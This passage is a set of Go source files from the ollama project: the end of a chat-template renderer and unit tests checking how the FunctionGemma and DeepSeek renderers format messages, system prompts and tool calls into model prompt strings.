len(filteredMessages)-1 prefill := lastMessage && message.Role == "assistant" switch message.Role { case "assistant": if len(message.ToolCalls) > 0 { sb.WriteString(imStartTag + "assistant\n") if message.Content != "" { sb.WriteString(message.Content + "\n") } for _, toolCall := range message.ToolCalls { sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">") for name, value := range toolCall.Function.Arguments.All() { valueStr := formatToolCallArgument(value) sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>") } sb.WriteString("\n</function>\n</tool_call>") } sb.WriteString("<|im_end|>\n") } else { sb.WriteString(imStartTag + "assistant\n") sb.WriteString(message.Content) if !prefill { sb.WriteString(imEndTag + "\n") } } case "tool": // consecutive tool responses should share a single `<im_start>user`, but // have their own <tool_response> tags // only start a new user block if this is the first tool response if i == 0 || filteredMessages[i-1].Role != "tool" { sb.WriteString(imStartTag + "user\n") } sb.WriteString("<tool_response>\n") sb.WriteString(message.Content) sb.WriteString("\n</tool_response>\n") // close the user block only if this is the last tool response if i == len(filteredMessages)-1 || filteredMessages[i+1].Role != "tool" { sb.WriteString(imEndTag + "\n") } default: sb.WriteString(imStartTag + message.Role + "\n") sb.WriteString(message.Content) sb.WriteString(imEndTag + "\n") } if lastMessage && !prefill { sb.WriteString(imStartTag + "assistant\n") } } return sb.String(), nil } func formatToolCallArgument(value any) string { if value == nil { return "null" } switch v := value.(type) { case string: return v case []byte: return string(v) } if reflect.TypeOf(value) != nil { kind := reflect.TypeOf(value).Kind() if kind == reflect.Map || kind == reflect.Slice || kind == reflect.Array { if marshalled, err := json.Marshal(value); err == nil { return string(marshalled) } } } return fmt.Sprintf("%v", value) } func formatToolDefinitionType(tp api.PropertyType) string { if len(tp) == 0 { return "[]" } if len(tp) == 1 { return tp[0] } // TODO(drifkin): it would be nice to format the JSON here similarly to // python's default json.dumps behavior (spaces after commas and colons). // This would let us be byte-for-byte compatible with the reference // implementation for most common inputs jsonBytes, err := json.Marshal(tp) if err != nil { return "[]" } return string(jsonBytes) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/functiongemma_test.go
model/renderers/functiongemma_test.go
package renderers import ( "testing" "github.com/ollama/ollama/api" "github.com/stretchr/testify/assert" ) func TestFunctionGemmaRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool expected string }{ { name: "basic_user_message", messages: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_system_message", messages: []api.Message{ {Role: "system", Content: "You are helpful"}, {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>developer\nYou are helpful<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_developer_role", messages: []api.Message{ {Role: "developer", Content: "You are a coding assistant"}, {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>developer\nYou are a coding assistant<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "custom_system_message_with_tools", messages: []api.Message{ {Role: "system", Content: "You are a weather expert."}, {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // Custom system message is preserved, tools are appended expected: "<bos><start_of_turn>developer\nYou are a weather expert.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "developer_role_with_tools", messages: []api.Message{ {Role: "developer", Content: "Be concise."}, {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // Developer role message is preserved, tools are appended expected: "<bos><start_of_turn>developer\nBe concise.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "multi_turn", messages: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!"}, {Role: "user", Content: "More"}, }, expected: "<bos><start_of_turn>user\nHi<end_of_turn>\n<start_of_turn>model\nHello!<end_of_turn>\n<start_of_turn>user\nMore<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_tools", messages: []api.Message{ {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "tool_call", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>", }, { name: "assistant_content_with_tool_call", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", Content: "Let me check.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\nLet me check.<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>", }, { name: "numeric_arguments", messages: []api.Message{ {Role: "user", Content: "Add"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "add", Arguments: testArgs(map[string]any{"a": float64(1), "b": float64(2)}), }, }, }, }, {Role: "tool", Content: "3"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "add", Description: "Add numbers", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "a": {Type: api.PropertyType{"number"}}, "b": {Type: api.PropertyType{"number"}}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:add{description:<escape>Add numbers<escape>,parameters:{properties:{a:{description:<escape><escape>,type:<escape>NUMBER<escape>},b:{description:<escape><escape>,type:<escape>NUMBER<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nAdd<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:add{a:1,b:2}<end_function_call><start_function_response>response:add{<escape>3<escape>}<end_function_response>", }, { name: "empty_messages", messages: []api.Message{}, expected: "<bos><start_of_turn>model\n", }, { name: "tool_with_required_params", messages: []api.Message{ {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Gets the weather for a given city", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City Name"}, "country": {Type: api.PropertyType{"string"}, Description: "Country Name"}, }), }, }, }, }, // Required params are escaped: required:[<escape>city<escape>] expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Gets the weather for a given city<escape>,parameters:{properties:{city:{description:<escape>City Name<escape>,type:<escape>STRING<escape>},country:{description:<escape>Country Name<escape>,type:<escape>STRING<escape>}},required:[<escape>city<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "multiple_tools", messages: []api.Message{ {Role: "user", Content: "Weather and time?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "get_time", Description: "Get current time", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"}, }), }, }, }, }, // Multiple tool declarations are consecutive expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n", }, { name: "parallel_tool_calls", messages: []api.Message{ {Role: "user", Content: "Weather and time?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, { Function: api.ToolCallFunction{ Name: "get_time", Arguments: testArgs(map[string]any{"timezone": "UTC"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "tool", Content: "12:00"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "get_time", Description: "Get current time", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"}, }), }, }, }, }, // Multiple tool calls and responses are consecutive expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_call>call:get_time{timezone:<escape>UTC<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response><start_function_response>response:get_time{<escape>12:00<escape>}<end_function_response>", }, { name: "user_after_tool_response", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "user", Content: "Thanks! What about London?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // User message after tool response gets concatenated (user reverted to this behavior) expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>Thanks! What about London?<end_of_turn>\n<start_of_turn>model\n", }, // Edge cases { name: "tool_empty_properties", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test_fn", Description: "", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{}), }, }, }, }, // Empty properties are omitted expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test_fn{description:<escape><escape>,parameters:{type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, { name: "unicode_content", messages: []api.Message{ {Role: "user", Content: "こんにちは 🎉"}, }, expected: "<bos><start_of_turn>user\nこんにちは 🎉<end_of_turn>\n<start_of_turn>model\n", }, { name: "newlines_in_content", messages: []api.Message{ {Role: "user", Content: "Line 1\nLine 2\nLine 3"}, }, expected: "<bos><start_of_turn>user\nLine 1\nLine 2\nLine 3<end_of_turn>\n<start_of_turn>model\n", }, { name: "special_chars_in_content", messages: []api.Message{ {Role: "user", Content: "Test <tag> & \"quotes\" chars"}, }, expected: "<bos><start_of_turn>user\nTest <tag> & \"quotes\" chars<end_of_turn>\n<start_of_turn>model\n", }, { name: "boolean_argument", messages: []api.Message{ {Role: "user", Content: "Set flag"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "set_flag", Arguments: testArgs(map[string]any{"enabled": true}), }, }, }, }, {Role: "tool", Content: "done"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "set_flag", Description: "Set a flag", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:set_flag{description:<escape>Set a flag<escape>,parameters:{properties:{enabled:{description:<escape>Flag value<escape>,type:<escape>BOOLEAN<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nSet flag<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:set_flag{enabled:true}<end_function_call><start_function_response>response:set_flag{<escape>done<escape>}<end_function_response>", }, { name: "multiple_required_params", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test", Description: "Test", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"a", "b", "c"}, Properties: testPropsMap(map[string]api.ToolProperty{ "a": {Type: api.PropertyType{"string"}, Description: "A"}, "b": {Type: api.PropertyType{"string"}, Description: "B"}, "c": {Type: api.PropertyType{"string"}, Description: "C"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{a:{description:<escape>A<escape>,type:<escape>STRING<escape>},b:{description:<escape>B<escape>,type:<escape>STRING<escape>},c:{description:<escape>C<escape>,type:<escape>STRING<escape>}},required:[<escape>a<escape>,<escape>b<escape>,<escape>c<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, { name: "array_type_param", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test", Description: "Test", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "items": {Type: api.PropertyType{"array"}, Description: "List of items"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{items:{description:<escape>List of items<escape>,type:<escape>ARRAY<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { renderer := &FunctionGemmaRenderer{} result, err := renderer.Render(tt.messages, tt.tools, nil) assert.NoError(t, err) assert.Equal(t, tt.expected, result) }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/deepseek3_test.go
model/renderers/deepseek3_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestDeepSeekRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Hello, how are you?<|Assistant|></think>`, }, { name: "basic with system message", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|></think>`, }, { name: "multiple system messages", messages: []api.Message{ {Role: "system", Content: "First instruction"}, {Role: "system", Content: "Second instruction"}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>First instruction Second instruction<|User|>Hello<|Assistant|></think>`, }, { name: "thinking enabled", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Hello, how are you?<|Assistant|><think>`, }, { name: "thinking enabled with system", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|><think>`, }, { name: "conversation with assistant response", messages: []api.Message{ {Role: "user", Content: "What is the capital of France?"}, {Role: "assistant", Content: "The capital of France is Paris."}, {Role: "user", Content: "Fantastic!"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What is the capital of France?<|Assistant|></think>The capital of France is Paris.<|end▁of▁sentence|><|User|>Fantastic!<|Assistant|></think>`, }, { name: "assistant with tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "assistant with content and tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think>I'll check the weather for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "tool response", messages: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>`, }, { name: "multiple tool calls", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris and London"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "London", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "tool", Content: "London: 18°C, Cloudy"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Get weather for Paris and London<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"London"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|><|tool▁output▁begin|>London: 18°C, Cloudy<|tool▁output▁end|>`, }, { name: "content with </think> tag removal", messages: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Content: "I'm thinking about this.</think>The answer is 42."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Think about this<|Assistant|></think>The answer is 42.<|end▁of▁sentence|>`, }, { name: "empty system message", messages: []api.Message{ {Role: "system", Content: ""}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Hello<|Assistant|></think>`, }, { name: "empty assistant content", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Hello<|Assistant|></think><|end▁of▁sentence|>`, }, { name: "special characters", messages: []api.Message{ {Role: "user", Content: "What about <|special|> tokens and \"quotes\"?"}, {Role: "assistant", Content: "They're handled normally."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What about <|special|> tokens and "quotes"?<|Assistant|></think>They're handled normally.<|end▁of▁sentence|>`, }, { name: "tool calls with null content", messages: []api.Message{ {Role: "user", Content: "Get weather"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Get weather<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "assistant after tool context", messages: []api.Message{ {Role: "user", Content: "Process data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "process", Arguments: testArgs(map[string]any{ "data": "test", }), }, }, }, }, {Role: "tool", Content: "Success"}, {Role: "assistant", Content: "Done"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Process data<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>process<|tool▁sep|>{"data":"test"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Success<|tool▁output▁end|>Done<|end▁of▁sentence|>`, }, { name: "no messages", messages: []api.Message{}, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>`, }, { name: "only system messages", messages: []api.Message{ {Role: "system", Content: "System instruction"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>System instruction`, }, { name: "multiple think tags in content", messages: []api.Message{ {Role: "user", Content: "Complex question"}, {Role: "assistant", Content: "First thought</think>Second thought</think>Final answer"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Complex question<|Assistant|></think>Second thought</think>Final answer<|end▁of▁sentence|>`, }, { name: "thinking enabled after tool call - should render thinking", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "Based on the weather data, it's sunny in Paris."}, {Role: "user", Content: "Now tell me about London weather too."}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>Based on the weather data, it's sunny in Paris.<|end▁of▁sentence|><|User|>Now tell me about London weather too.<|Assistant|><think>`, }, { name: "thinking disabled after tool call - should not render thinking", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "Based on the weather data, it's sunny in Paris."}, {Role: "user", Content: "Now tell me about London weather too."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>Based on the weather data, it's sunny in Paris.<|end▁of▁sentence|><|User|>Now tell me about London weather too.<|Assistant|></think>`, }, { name: "thinking enabled but messages without thinking content", messages: []api.Message{ {Role: "user", Content: "First question about cats"}, {Role: "assistant", Content: "Cats are wonderful pets."}, {Role: "user", Content: "What about dogs?"}, {Role: "assistant", Content: "Dogs are loyal companions."}, {Role: "user", Content: "Final question about birds"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>First question about cats<|Assistant|></think>Cats are wonderful pets.<|end▁of▁sentence|><|User|>What about dogs?<|Assistant|></think>Dogs are loyal companions.<|end▁of▁sentence|><|User|>Final question about birds<|Assistant|><think>`, }, { name: "thinking disabled for all assistant responses", messages: []api.Message{ {Role: "user", Content: "First question about cats"}, {Role: "assistant", Content: "Cats are wonderful pets."}, {Role: "user", Content: "What about dogs?"}, {Role: "assistant", Content: "Dogs are loyal companions."}, {Role: "user", Content: "Final question about birds"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>First question about cats<|Assistant|></think>Cats are wonderful pets.<|end▁of▁sentence|><|User|>What about dogs?<|Assistant|></think>Dogs are loyal companions.<|end▁of▁sentence|><|User|>Final question about birds<|Assistant|></think>`, }, { name: "complex conversation with tool calls and thinking enabled", messages: []api.Message{ {Role: "user", Content: "Tell me about the weather"}, {Role: "assistant", 